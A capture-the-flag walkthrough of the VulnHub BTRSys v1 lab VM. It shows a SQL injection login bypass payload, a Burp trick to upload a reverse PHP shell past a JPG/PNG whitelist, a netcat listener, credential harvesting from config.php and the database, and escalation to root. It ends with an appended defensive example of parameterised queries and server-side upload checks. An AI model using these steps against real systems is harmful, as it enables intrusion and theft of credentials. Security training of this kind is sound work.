BTRSys: v1 target VM
Target URL: https://www.vulnhub.com/entry/btrsys-v1,195/
Difficulty: beginner/intermediate
arp-scan -l to find the target IP: x.x.x.229
nmap -sV -Pn -A x.x.x.229 finds ports 80, 22 and 21
dirb http://x.x.x.229 -X .php
finds config.php and login.php
Try logging in with weak passwords; no luck.
View the page source.
substring is a substring operation: it starts one character after the "@" and runs to the length of the entered username, i.e. from the "@" to the end; the resulting str must equal btrisk.com.
The pwd field is obviously the weak spot, so just craft any injection.
Username: xxx@btrisk.com
Password: ' or 1=1 -- -
Login succeeds; there is a file-upload point.
Intercept with Burp and upload a file to get a shell
Uploads are allowed, so upload a reverse PHP shell directly.
The whitelist is hard-coded to JPG or PNG only, so rename shell.php to shell.jpg.
Intercept with Burp, change the jpg suffix back to php, Go; the upload succeeds.
The uploaded reverse PHP shell can be seen under http://x.x.x/uploads/
In Kali, nc -lvp 1234
start the listener and wait for the callback.
Get an interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'
In the shell, go to the web root and look at the config file config.php.
It contains the database password:
$con=mysqli_connect("localhost","root","toor","deneme");
Log in to the database directly and see what is there.
mysql -u root -p
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| deneme |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use deneme;
use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user |
+------------------+
1 row in set (0.00 sec)
mysql> select * from user
select * from user
-> ;
;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad | Kullanici_Adi | Parola | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| 1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet | muhasebe | nazli | lokantaci | 5 |
| 2 | can demir | cdmir@btrisk.com | asd123*** | mahmut | memur | gulsah | tuhafiyeci | 8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
Both passwords are asd123***
su root directly with it.
Summary
1. The key point of this box is that you get nothing but a login page, with no other information, so it is either brute force, or injection and bypass.
2. There is a backend upload form, and the file name is not checked after upload either; intercept the request to bypass the whitelist restriction and upload.
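Added example (not from the original write-up) showing, from the defender's side, why both points in the summary work and what closes them: the login query built by string concatenation versus a parameterised one, and a server-side upload check that ignores the client-supplied file name. The table, column names and rows are modelled on the deneme.user output above; the function names are my own.

```python
import secrets
import sqlite3

# Constructed sample data modelled on the deneme.user table in the write-up.
# (The box stores plaintext passwords; a real app would store password hashes.)
_ROWS = [
    ("ikaya@btrisk.com", "asd123***"),
    ("cdmir@btrisk.com", "asd123***"),
]


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (Kullanici_Adi TEXT, Parola TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?)", _ROWS)
    return con


def vulnerable_login(user, pwd):
    """Query assembled by string concatenation: the page's payload
    ' or 1=1 -- -  turns the WHERE clause into '... OR 1=1' and comments out
    the trailing quote, so a row is returned without knowing any password."""
    sql = (f"SELECT Kullanici_Adi FROM user WHERE Kullanici_Adi='{user}' "
           f"AND Parola='{pwd}'")
    return _db().execute(sql).fetchone() is not None


def safe_login(user, pwd):
    """Parameterised query: the same payload is compared as a literal string
    and never matches, so only a real username/password pair logs in."""
    row = _db().execute(
        "SELECT Kullanici_Adi FROM user WHERE Kullanici_Adi=? AND Parola=?",
        (user, pwd)).fetchone()
    return row is not None


_ALLOWED = {"jpg", "png"}


def server_side_upload_name(client_filename):
    """Whitelist enforced on the server, where Burp cannot rewrite it after the
    fact. Only the final extension is inspected, and the client name is then
    discarded in favour of a random one, so shell.php is rejected and a name
    like shell.php.jpg is stored with a single .jpg extension."""
    if "." not in client_filename:
        return None
    ext = client_filename.rsplit(".", 1)[1].lower()
    if ext not in _ALLOWED:
        return None
    return f"{secrets.token_hex(8)}.{ext}"
```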